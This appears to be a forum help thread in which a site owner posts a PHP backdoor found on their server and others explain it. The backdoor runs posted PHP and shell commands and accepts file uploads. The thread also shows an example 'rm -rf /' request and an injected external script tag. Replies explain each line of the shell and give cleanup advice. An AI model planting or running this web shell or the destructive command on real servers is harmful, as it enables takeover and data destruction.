I recently found 4 bizarre files on my server (that I didn't upload). The filename were like this: goog1e7a20543b128921.php
And here's the code that was inside them:
Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>
Do you have any idea what this code is supposed to do..? Should I start to panic..?
Thanks.
Yep, this is malicious code. This shell script will allow to execute code as well as upload any file is the attacker knows the parameters passed to it. I recommend searching all files for that code, verify file permission and change your passwords just in case.
It's a backdoor into your webserver.
It allows attackers to send a request to http://you.com/goog1e7a20543b128921.php?s=rm -rf / to delete your entire system.
You should then conduct a thorough security review of your site to figure out how they got there in the first place.
I would suggest you to use the HTML Purifier or OWASP to make things a lot secure.
You must disable the eval construct if you are not using that (and you shouldn't unless you really need to).
Analyze the server settings for any security holes with:
eval($e) - remote execute command system - eq. for listind directory $_FILES['f']['name'] - for uploand script to server eq hack tools etc
apparently you are not the only one with these. googled it real quick, other sites seem infected as well. it looks like all the time the infected file stores itself in the images folder.
For reference:
if($e){eval($e);}
This allows the attacker to execute any PHP command they want.
if($s){system($s);}
This allows the attacker to execute any system command they want, as whatever user your webserver runs as.
if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}
This allows the attacker to upload any file they want - again the user your webserver runs as determines file permissions.
In summary, panic :-p
I'm sure there are lots of articles online on how to deal with this. In brief, back up your system for analysis later, reinstall server from scratch (You don't know what else they have done to you so just deleting the files isn't good enough.) while trying to work out how they got in and plugging the hole.
Related: Try installing phpAntiVirus for the future, and ask your provider for mod_security. This might mitigate future hacks. Those files didn't materialize all by itself on your server anyway. Get rid of all older PHP applications.
Look for this in each file. script src="http://nt02.co.in/3"> if you find one using your ftp look at the date the files was modified and open all the files modified on that date and remove it.
badbo Monster Killer